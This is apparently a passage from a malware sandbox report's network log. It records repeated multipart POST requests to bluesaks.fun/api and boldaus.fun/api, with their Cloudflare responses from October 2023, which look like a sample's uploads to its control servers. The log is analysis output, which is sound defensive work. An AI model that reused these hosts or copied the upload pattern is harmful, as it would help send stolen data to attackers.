                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g3KIW1fve735t1yE%2Fq2tsdAVuEuQd60JG7K8NcgmiN0E9NO1KzwcD1kwmlxTwSw5Z59dKzqyjxSlxv9aBB8xotP5piKaVt3TTiLhVL4HaUkt1cUlpCHah6mJAptfmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b25599fb4f0b6e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 16053
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=u602h4pegjrj1l0mbema2ep4nn; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S8qU%2FPWC2OAGEdpnRHjZ7YEeF1lx1bLTufw3kX7385AtY3B%2Bb%2FaMg%2FriBvzu9jHPdG4YxaBFKy7B7EpUWxx4MdSxQVeu6Pfy%2FB5mVrSa1TSjKzh5OJvtD7TDIZoziOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559d8cf0b76c-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 16060
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=acuc2g0ghbkg49lssgpk11fg8p; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iIDlloO6fbV9VtOIXWHCb6OdfRuhyonWibdHGYnCGVQQ15jyGpoBldYkw3gApFsVOyflrPin3xoVfe9iUztTWb2aGRbcH5w6wSn73Y%2FYKruR37Ky4A5NNaNmQ5MlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559dae55b724-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=l8tblkr7lg8hnv8ut325cd5s7k; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bo6UtQd15Vcxy5T7OZNKf9xnrE%2BmeYJOFWVbCEQ8Uu0IH0UOXaN3ucsj1c9Ig4qG5%2BuXQhKVyY6nnnBCbwSJUAWOYxKBS7gd35avryd22MTZ9QXdSnmNo9mRxEQuOLw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559f5b08b8b4-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=1hp7u802b68t1r06hehh697a8r; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fFlm3fvJBqV51lV%2BGGmWUr8o5GiecCB2ejw5ZoVHGIZmKvBVNqkr1Dy%2FBifdqdP75%2ByiIxMeZ%2BMkfeG7fY0Ry6G%2FUYNGCbaluYzO8pK1NzQ6%2BQ8nFtLRh%2FMfoLXCQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559f59010b70-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=64in4tl0eeo76ss4u66jjaph9p; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=laNKwkjdYpDZt%2BnVSmYhl4spUayfrTlQC%2BNmZgBo6Cu3fUFgg6S0KeCCY5LG%2F4w%2FLIAY1rdCiYRF9bqgrEHA0beuQJ8CBOy4hUBJPHBdV44SAjW0eqDs5NOE%2B84mLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a04832b927-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=083g0vr8flmggpf5fks1qp643e; expires=Sat, 17 Feb 2024 06:35:09 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:30 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clpco5jEuWp9A8Eatp0qk%2FrsE54XRxNF0NVfqRBhMxQ29pZU5KppM%2FIS0tIt%2B1j958RYebdwY8g8nXewQ1B%2FjEdFYvs5BDZcgbWxvRKtJjlWbORaeLIV5wNYeh%2BVfM4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a0ae23655c-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=9nlh4hjvg2hk7ord124d35ea2o; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VZ6fE%2FpaDu%2FlQ56Fjo77reOMGuIsnDskIaz2y2aoLqRFVGxzmmVkUh8R%2Fr%2BirxG47bxwSVSw2ExqW9QVE3jA9AkFqq1gt4zt8Mr3SfqUgd1%2FtKNZYr7wFi%2BE1PazMk8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a248ec1c98-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=pqr292bc5t6vfh9im16ce5f4hd; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KuVaAfl5F8KMap99W9spS3s4LxdRTO1z2%2B2HWACiBk52z2%2BkM1iQolbK5gYV2A6mRfkPykxtthuKtXimesUuO1h4iOCBnXSVpYw6bzHd3yQawBu6YEr3htPXfjvMCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a2cf240a51-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=38r8ssabd99svac0d5rn4qq8la; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=csQIMJtB5xI8YFPs%2BojowNTz7imXoBe8PWQ3cSTDjVRAfOntTGd0Ze3uXewPmNfBFQPvSg0yXS%2BTeckG796QaW7b72i2X1iSshiH6YJCh9nh00F7EA%2BSk5VC0eA2UdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a36e08668e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=jlkh8rc44ht0rdq65kj1bbq2hi; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cbAmGQ0oVUTGnM92r9gvVY97Z4xWwwj6w4iWUFWlg%2FOgxiqVvNxIRbXexIhG6RYHqvNtVu28fsCOtWE60avtLt3akv0%2FEUyKerIYz2E3GlWvNqt0AHe9TBHmuhId%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a3fa626649-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=vm43q9jb5jnres2epjhhf166bq; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=74Cjzcu%2BIpKb2zN0LrrS8YcdH4Jebr%2B2Ha0GGyaCOsiMnSsokMKKsfOP5qhxbpauOUIhfaXvFgQKWszVR8HNoxRebWsRbO9c%2BmBrIwXAXSEgweeC8TiYfljYss6lZUQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a4cfbb1c83-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=tg3f11i4ullr1iamuvisvbn9a2; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qljaTl%2FTeyxjuhqCnSXrDPsQMHZcRkfyWl%2B4SG4BfhFdFxHj0xj0E%2FI3RMnPeEsmFJ%2BhMep5fjQ3hSlTbFOZ3PLWECEnM98BwFLzWbD2c5ZzbE67z6On1SFkpENR7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a56af41c90-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
